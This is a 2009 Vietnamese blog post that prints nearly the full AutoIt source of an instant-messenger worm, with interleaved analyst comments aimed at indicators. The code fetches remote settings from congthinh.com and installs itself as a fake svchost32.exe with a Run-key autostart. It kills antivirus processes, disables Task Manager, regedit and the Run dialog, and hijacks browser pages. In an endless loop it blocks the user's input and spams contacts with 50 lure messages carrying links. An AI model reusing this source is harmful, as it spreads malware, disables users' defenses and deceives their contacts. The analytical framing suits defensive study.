Mar 12, 2009

autoit của công thịnh .com


code virut auto it của site congthinh.com
vẫn là autoit như mọi lần… nhưng lần này có thêm 1 số file mới

Extract ra được file .jpg; đổi đuôi file này thành .zip rồi extract thêm 1 lần nữa
pass: 123456
Các file extract ra:
apps.dat
inst.dat
mc.dat
pk.bin
rinst.exe
titles.dat
vinh.exe
Xinh.exe
Xinhhk.dll

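code (lưu ý: các dấu "\" trong đường dẫn file và khóa registry đã bị mất khi đăng lên trang, nên các chuỗi bên dưới không còn đúng nguyên bản):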

; Analyst notes - setup stage of the script as shown in this listing.
; What the visible code does: fetches a small remote text file, reads three
; values from it, copies the running executable under a svchost-like name,
; deletes some files, closes a few named processes, and writes a set of
; registry values (policy lock-downs, browser/IM settings, a Run entry).
; NOTE(review): the path and registry strings below have no "\" separators
; (e.g. "C:Documents and Settings"); this looks like the page stripped the
; backslashes. Treat the strings as approximate when deriving indicators and
; confirm against the actual sample.

; Directive: run without showing the AutoIt tray icon.
#NoTrayIcon
; Download the remote file into the Windows directory. Third argument 1 = force
; a reload from the remote site, fourth argument 0 = wait for the download.
InetGet("http://congthinh.com/vinh.txt", @WindowsDir & "vinhauto.txt", 1, 0)
; Open the downloaded file in read mode (0) and take its first three lines.
; These values are used later as link prefixes and as the forced web address,
; so the lure targets are controlled by whoever serves vinh.txt.
$FILE = FileOpen(@WindowsDir & "vinhauto.txt", 0)
$LINK = FileReadLine($FILE, 1)
$LINK2 = FileReadLine($FILE, 2)
$WEBSITE = FileReadLine($FILE, 3)
; Create a directory under the Windows directory and copy the currently running
; executable (@AutoItExe) there as "svchost32.exe" - a name resembling the
; legitimate svchost.exe. The same path is registered in the Run key below.
DirCreate(@WindowsDir & "systemsystem32")
FileCopy(@AutoItExe, @WindowsDir & "systemsystem32svchost32.exe")
; Delete "Cookies*.txt" for the current user (presumably the browser cookie
; files under the user profile - confirm the real path).
FileDelete("C:Documents and Settings" & @UserName & "Cookies*.txt")
; Delete several svchost*/updt executables under the Windows directory.
; NOTE(review): presumably clean-up of earlier variants or competing copies -
; not established by this listing.
FileDelete(@WindowsDir & "systemsvchost.exe")
FileDelete(@WindowsDir & "systemsvchost32.exe")
FileDelete(@WindowsDir & "svchost32.exe")
FileDelete(@WindowsDir & "svchost.exe")
FileDelete(@WindowsDir & "updt.exe")
; DriveGetDrive("all") returns an array of drives, but $VAR is concatenated as
; a whole rather than indexed, so this FileDelete probably does not visit each
; drive as the author seems to have intended - TODO confirm on the sample.
$VAR = DriveGetDrive("all")
FileDelete("" & $VAR & "auto.exe")
; Remove a Run value named "SVCHOST" under HKLM (presumably an older autostart
; entry; a new one named "Task Manager" is written further down).
RegDelete("HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun", "SVCHOST")
; Terminate specific processes if they are running.
; NOTE(review): Bkav2006.exe looks like the Bkav antivirus, and bdss.exe /
; vsserv.exe are commonly associated with BitDefender; FastHelper.exe is not
; identified here - confirm before using as an indicator.
If ProcessExists("Bkav2006.exe") Then
	ProcessClose("Bkav2006.exe")
EndIf
If ProcessExists("FastHelper.exe") Then
	ProcessClose("FastHelper.exe")
EndIf
If ProcessExists("bdss.exe") Then
	ProcessClose("bdss.exe")
	; vsserv.exe is closed only when bdss.exe was found; it is not checked separately.
	ProcessClose("vsserv.exe")
EndIf
; Per-user policy values set to 1: an Internet Explorer "Homepage" policy plus
; DisableTaskMgr, DisableRegistryTools and NoRun. For responders these HKCU
; values are both an indicator and something to reset during clean-up, since
; they take away Task Manager, the registry editor and the Run dialog.
RegWrite("HKEY_CURRENT_USERSoftwarePoliciesMicrosoftInternet ExplorerControl Panel", "Homepage", "REG_DWORD", "1")
RegWrite("HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem", "DisableTaskMgr", "REG_DWORD", "1")
RegWrite("HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem", "DisableRegistryTools", "REG_DWORD", "1")
RegWrite("HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer", "NoRun", "REG_DWORD", "1")
; Point the Internet Explorer start page and two Yahoo Messenger "content url"
; values at the address read from line 3 of the downloaded file.
RegWrite("HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMain", "Start Page", "REG_SZ", $WEBSITE)
RegWrite("HKEY_CURRENT_USERSoftwareYahoopagerViewYMSGR_buzz", "content url", "REG_SZ", $WEBSITE)
RegWrite("HKEY_CURRENT_USERSoftwareYahoopagerViewYMSGR_Launchcast", "content url", "REG_SZ", $WEBSITE)
; Persistence: a machine-wide Run value named "Task Manager" whose data is the
; svchost32.exe copy made above. A Run value with that name pointing at a
; svchost-like file outside the real System32 is a straightforward hunt lead.
RegWrite("HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun", "Task Manager", "REG_SZ", @WindowsDir & "systemsystem32svchost32.exe")
; Google Toolbar notifier value KeepDS set to 0.
; NOTE(review): presumably turns off the toolbar's default-search protection - confirm.
RegWrite("HKEY_CURRENT_USERSoftwareGoogleGoogleToolbarNotifier", "KeepDS", "REG_DWORD", "0")
; Redirect the Search Assistant default search URL to the same site.
RegWrite("HKEY_CURRENT_USERSoftwareMicrosoftSearch Assistant", "DefaultSearchURL", "REG_SZ", "http://congthinh.com/?search=")
; Same NoRun write as above, repeated.
RegWrite("HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer", "NoRun", "REG_DWORD", "1")
; Analyst notes - table of 50 chat messages (indices 0-49) used by the loop
; that follows, which picks one at random and places it on the clipboard.
; Each entry is bait text (English, then unaccented Vietnamese from index 38)
; concatenated with a link prefix read from the downloaded file: entries 0-12
; use $LINK, entries 13-49 use $LINK2. The suffixes look like image, video or
; page names (.jpg, .gif, .wmv, .php, ?id=...), but what is actually served is
; decided by the remote host, so a file extension in a received link says
; nothing about the content. The exact texts are useful as message-content
; indicators for IM or mail filtering and for user-awareness material.
Dim $TIN[50]
; Entries 0-12: prefix taken from line 1 of the downloaded file ($LINK).
$TIN[0] = "Twenty-five dollars is to much to pay for that shirt : " & $LINK & "shirt.jpg   "
$TIN[1] = "I earn as much money as my website " & $LINK & "   "
$TIN[2] = "People belive that we wanted men is living near you " & $LINK & "wanted.jpg  be careful !!!    "
$TIN[3] = "People allege that he stole 100000 Dollars : " & $LINK & "hisimages.jpg   "
$TIN[4] = "I look radian in my new dress : " & $LINK & "newdress.jpg :x :x   "
$TIN[5] = "What a interesting film !!! " & $LINK & "film.wmv It's the most interesting film i've ever seen   "
$TIN[6] = ":)) My family was elated by the news . I won an iPhone. You will never believe it :O " & $LINK & "mylottery.jpg     "
$TIN[7] = "This is my one-off Xmase-card for you ^_^  " & $LINK & "?id=ecard Very nice !!! =))   "
$TIN[8] = "you are virus infected . Use this tool to remove viruses from your PC : " & $LINK & "?id=virus_shield    "
$TIN[9] = "Microsoft to release 2007 free-of-charge packs of Windows Vista for its first 2007 online registered users: " & $LINK & "?id=vista   "
$TIN[10] = "Breaking news : Osama Bin Laden has been arrested !! : " & $LINK & "?id=news   "
$TIN[11] = "My new personal website: " & $LINK & "   c0ol !!! "
$TIN[12] = "OMG !!! Google was hacked : " & $LINK & "?id=google     "
; Entries 13-49: prefix taken from line 2 of the downloaded file ($LINK2).
$TIN[13] = ":D who is beside you in this pic " & $LINK2 & "friendpic.gif so good-looking   "
$TIN[14] = ";) 1 of my vacation pictures " & $LINK2 & "vacation.gif < :-P  "
$TIN[15] = "hot pics this week " & $LINK2 & "hot.gif :x cool !!!  "
$TIN[16] = ";) 1 of my vacation pictures " & $LINK2 & "vacation.gif <:-P "
$TIN[17] = "Screenshot of my new Ipod " & $LINK2 & "ipod.gif so cool :D "
$TIN[18] = "never click into the links like something in this image " & $LINK2 & "dontclick.gif #:-S !!!  "
$TIN[19] = "Images shot in Viet Nam _ The war will never end " & $LINK2 & "VietNamWar.gif << :( "
$TIN[20] = ":( the page cannot be displayed " & $LINK2 & "error.gif Something was wrong !!! Check it again and tell me later. THanks !!!"
$TIN[21] = "My pics with my new lover " & $LINK2 & "mypics.gif :x b-( "
$TIN[22] = "New game  ;;) sexy beach 3 (man only) " & $LINK2 & "MissWorld.gif Ha Ha Ha!! "
$TIN[23] = "Do you realize who is in this image: " & $LINK2 & "who.gif . Just think for a moment and tell me soon ;))"
$TIN[24] = "damn it , she is so cute :x : " & $LINK2 & "girlcute.gif ... who is she ... do you know she ?"
$TIN[25] = "Be careful. There'll be earthquake tonight !!!  :  " & $LINK2 & "ghost.gif "
$TIN[26] = "I made 50 gifts for the first 50 people post comments on my own page :   " & $LINK2 & " "
$TIN[27] = "My new personal website: :   " & $LINK2 & " so c00l !!! "
$TIN[28] = "Yahoo to charge fee for its YM service :   " & $LINK2 & "?id=yahoo !!! "
$TIN[29] = "OMG ! She is really beautiful :x    " & $LINK2 & "DSC017473.GIF !!! "
$TIN[30] = "Download free MP3s     " & $LINK2 & "  "
$TIN[31] = "A new dangerous computer virus that can destroys all your data has just been released . Click here to know how to avoid it :  : " & $LINK2 & "?id=pc_protector ."
$TIN[32] = "You are Yahoo Winner .... Click Here to get a FREE SMART PHONE  : " & $LINK2 & "?id=yahoowinner ."
$TIN[33] = "Big, Beautiful & Single?Join a community for big beautiful women and those who admire them  : " & $LINK2 & "girlcute.gif ."
$TIN[34] = "oh my god , FREE  KOHLS $500 GIFT CARD! Warning:  Offer is EXTREMELY limited!  Get Yours Now! : " & $LINK2 & "?id=get ."
$TIN[35] = "Congratulations!You have been selected to receive a FREE* wireless MotoQ™ 9h smartphone .Click here   to see " & $LINK2 & "?id=MotoQ™ ."
$TIN[36] = "You're a YAHOO winner!A Free Laptop for You.Click check it out " & $LINK2 & "?id=yahoowinner ."
$TIN[37] = "Free Hot Sex Movies " & $LINK2 & "hotsex.wmv ."
$TIN[38] = "Kho Anh Avatar Dep Co Tai " & $LINK2 & "avatar.php ."
$TIN[39] = "Nhung Hinh Anh Hot Nhat Co Tai: " & $LINK2 & "hot.jpg ."
$TIN[40] = "Hoa Hau Hoan Vu 2008 Co Tai: " & $LINK2 & "hoahau.jpg ."
$TIN[41] = "Nhung Tin Tuc Moi Nhat Co Tai: " & $LINK2 & "news.php ."
$TIN[42] = "Em xinh qua,Toan nhung em mac bikini nong bong , hap dan , nhin ma them :P  " & $LINK2 & "bikini.php ."
$TIN[43] = "1 thang o tren mang kiem 2000$ , tai sao ban khong thu?  " & $LINK2 & "kiemtien.php ."
$TIN[44] = "Tai sao anh? cua ban. lai. co' o? day ne`  " & $LINK2 & "webcam.jpg ."
$TIN[45] = "Vao day de bau chon cho Hoa Hau VN  " & $LINK2 & "bauchon.php ."
$TIN[46] = "Website moi' lam` , vao` tham quan ti' di  " & $LINK2 & " ."
$TIN[47] = "CLUB Tuoi? TEEN  " & $LINK2 & "teen.php ."
$TIN[48] = " Anh? moi' cua? Thuy TOP (Qua? boom tan^ VN)  " & $LINK2 & "thuytop.gif ."
$TIN[49] = " Paris Hilton chup anh? NUDE ne , nguoi` dep the)  " & $LINK2 & "paris.jpg ."
; Analyst notes - main loop; it never exits. Each pass waits 30 seconds, looks
; for Explorer and instant-messenger windows by title, acts on every window it
; finds by sending keystrokes, then waits 900000 ms (15 minutes).
; Variable names are Vietnamese: TIEUDE = title, KIEMTRA = check,
; NGAUNHIEN = random.
; Symptoms a user or responder can see, all visible in the code: the clipboard
; is overwritten (ClipPut), keyboard and mouse input is blocked for the length
; of each action (BlockInput(1) ... BlockInput(0)), and target windows are
; pulled to the foreground (WinActivate).
; NOTE(review): the Send() sequences rely on the menu layout and shortcuts of
; the client versions of that period; what each sequence selects is inferred,
; not verified.
While (1)
	Sleep(30000)
	; Resolve the full title of each window of interest, then test for it.
	$TIEUDE0 = WinGetTitle("My Computer", "")
	$KIEMTRA0 = WinExists($TIEUDE0)
	$TIEUDE0X = WinGetTitle("Windows Explorer", "")
	$KIEMTRA0X = WinExists($TIEUDE0X)
	$TIEUDE1 = WinGetTitle("Yahoo! Messenger", "")
	$KIEMTRA1 = WinExists($TIEUDE1)
	$TIEUDE2 = WinGetTitle("AIM", "")
	$KIEMTRA2 = WinExists($TIEUDE2)
	$TIEUDE3 = WinGetTitle("Windows Live Messenger", "")
	$KIEMTRA3 = WinExists($TIEUDE3)
	$TIEUDE4 = WinGetTitle("Windows Messenger", "")
	$KIEMTRA4 = WinExists($TIEUDE4)
	$TIEUDE5 = WinGetTitle("Yahoo!7 Messenger", "")
	$KIEMTRA5 = WinExists($TIEUDE5)
	; "My Computer" window: put $WEBSITE on the clipboard, press F6 (presumably
	; to reach the address bar), paste and press Enter, so the window is sent
	; to the configured address.
	If $KIEMTRA0 = 1 Then
		ClipPut($WEBSITE)
		BlockInput(1)
		WinActivate($TIEUDE0)
		Send("{F6}")
		Send("^v {ENTER}")
		BlockInput(0)
	EndIf
	; "Windows Explorer" window: same sequence as the branch above.
	If $KIEMTRA0X = 1 Then
		ClipPut($WEBSITE)
		BlockInput(1)
		WinActivate($TIEUDE0X)
		Send("{F6}")
		Send("^v {ENTER}")
		BlockInput(0)
	EndIf
	; Yahoo! Messenger: pick a random message (integer index 0-49), copy it to
	; the clipboard and drive the client with menu shortcuts. The message is
	; pasted twice, so presumably it goes to two places in the client (for
	; example a status text and a message to selected contacts) - unverified.
	If $KIEMTRA1 = 1 Then
		$NGAUNHIEN = Random(0, 49, 1)
		ClipPut($TIN[$NGAUNHIEN])
		BlockInput(1)
		WinActivate($TIEUDE1)
		Send("!m")
		Send("un")
		Send("^v {ENTER}{ENTER}")
		Send("^m")
		Send("{DOWN}")
		Send("^{SHIFTDOWN}{END}{SHIFTUP}")
		Send("{ENTER}")
		Send("^v")
		Send("!s")
		BlockInput(0)
	EndIf
	; AIM: random message to the clipboard, a list selection via Home / Down /
	; Ctrl+Shift+PgDn, paste and Enter, then Alt+F4 twice to close windows.
	If $KIEMTRA2 = 1 Then
		$NGAUNHIEN = Random(0, 49, 1)
		ClipPut($TIN[$NGAUNHIEN])
		BlockInput(1)
		WinActivate($TIEUDE2)
		Send("{HOME}")
		Send("{DOWN}")
		Send("^{SHIFTDOWN}{PGDN}{SHIFTUP}")
		Send("{ENTER}")
		Send("^v {ENTER}")
		Send("!{F4}")
		Send("!{F4}")
		BlockInput(0)
	EndIf
	; Windows Live Messenger: opens a menu item (Alt, "a", Enter), then sends
	; Space / Down alternately - eleven Space presses in all, presumably ticking
	; successive entries in a list - confirms, pastes the message and closes the
	; window with Alt+F4.
	If $KIEMTRA3 = 1 Then
		$NGAUNHIEN = Random(0, 49, 1)
		ClipPut($TIN[$NGAUNHIEN])
		BlockInput(1)
		WinActivate($TIEUDE3)
		Send("{ALT}")
		Send("a")
		Send("{ENTER}")
		Send("{SPACE}")
		Send("{DOWN}")
		Send("{SPACE}")
		Send("{DOWN}")
		Send("{SPACE}")
		Send("{DOWN}")
		Send("{SPACE}")
		Send("{DOWN}")
		Send("{SPACE}")
		Send("{DOWN}")
		Send("{SPACE}")
		Send("{DOWN}")
		Send("{SPACE}")
		Send("{DOWN}")
		Send("{SPACE}")
		Send("{DOWN}")
		Send("{SPACE}")
		Send("{DOWN}")
		Send("{SPACE}")
		Send("{DOWN}")
		Send("{SPACE}")
		Send("{ENTER}")
		Send("^v {ENTER}")
		Send("!{F4}")
		BlockInput(0)
	EndIf
	; Windows Messenger: the same menu sequence is repeated six times, moving
	; 4, 5, 6, 7, 8 and then 9 entries down before Enter; each round pastes the
	; same clipboard message and closes the window it opened. Presumably each
	; round targets the next entry in a list - unverified.
	If $KIEMTRA4 = 1 Then
		$NGAUNHIEN = Random(0, 49, 1)
		ClipPut($TIN[$NGAUNHIEN])
		BlockInput(1)
		WinActivate($TIEUDE4)
		; Round 1: four entries down.
		Send("{ALT}")
		Send("a")
		Send("{ENTER}")
		Send("{DOWN}")
		Send("{DOWN}")
		Send("{DOWN}")
		Send("{DOWN}")
		Send("{ENTER}")
		Send("^v {ENTER}")
		Send("!{F4}")
		; Round 2: five entries down.
		Send("{ALT}")
		Send("a")
		Send("{ENTER}")
		Send("{DOWN}")
		Send("{DOWN}")
		Send("{DOWN}")
		Send("{DOWN}")
		Send("{DOWN}")
		Send("{ENTER}")
		Send("^v {ENTER}")
		Send("!{F4}")
		; Round 3: six entries down.
		Send("{ALT}")
		Send("a")
		Send("{ENTER}")
		Send("{DOWN}")
		Send("{DOWN}")
		Send("{DOWN}")
		Send("{DOWN}")
		Send("{DOWN}")
		Send("{DOWN}")
		Send("{ENTER}")
		Send("^v {ENTER}")
		Send("!{F4}")
		; Round 4: seven entries down.
		Send("{ALT}")
		Send("a")
		Send("{ENTER}")
		Send("{DOWN}")
		Send("{DOWN}")
		Send("{DOWN}")
		Send("{DOWN}")
		Send("{DOWN}")
		Send("{DOWN}")
		Send("{DOWN}")
		Send("{ENTER}")
		Send("^v {ENTER}")
		Send("!{F4}")
		; Round 5: eight entries down.
		Send("{ALT}")
		Send("a")
		Send("{ENTER}")
		Send("{DOWN}")
		Send("{DOWN}")
		Send("{DOWN}")
		Send("{DOWN}")
		Send("{DOWN}")
		Send("{DOWN}")
		Send("{DOWN}")
		Send("{DOWN}")
		Send("{ENTER}")
		Send("^v {ENTER}")
		Send("!{F4}")
		; Round 6: nine entries down.
		Send("{ALT}")
		Send("a")
		Send("{ENTER}")
		Send("{DOWN}")
		Send("{DOWN}")
		Send("{DOWN}")
		Send("{DOWN}")
		Send("{DOWN}")
		Send("{DOWN}")
		Send("{DOWN}")
		Send("{DOWN}")
		Send("{DOWN}")
		Send("{ENTER}")
		Send("^v {ENTER}")
		Send("!{F4}")
		BlockInput(0)
	EndIf
	; "Yahoo!7 Messenger" window: same keystroke sequence as the Yahoo!
	; Messenger branch above.
	If $KIEMTRA5 = 1 Then
		$NGAUNHIEN = Random(0, 49, 1)
		ClipPut($TIN[$NGAUNHIEN])
		BlockInput(1)
		WinActivate($TIEUDE5)
		Send("!m")
		Send("un")
		Send("^v {ENTER}{ENTER}")
		Send("^m")
		Send("{DOWN}")
		Send("^{SHIFTDOWN}{END}{SHIFTUP}")
		Send("{ENTER}")
		Send("^v")
		Send("!s")
		BlockInput(0)
	EndIf
	; 15-minute pause before the next pass.
	Sleep(900000)
WEnd
Article Categories:
Virut/Trojan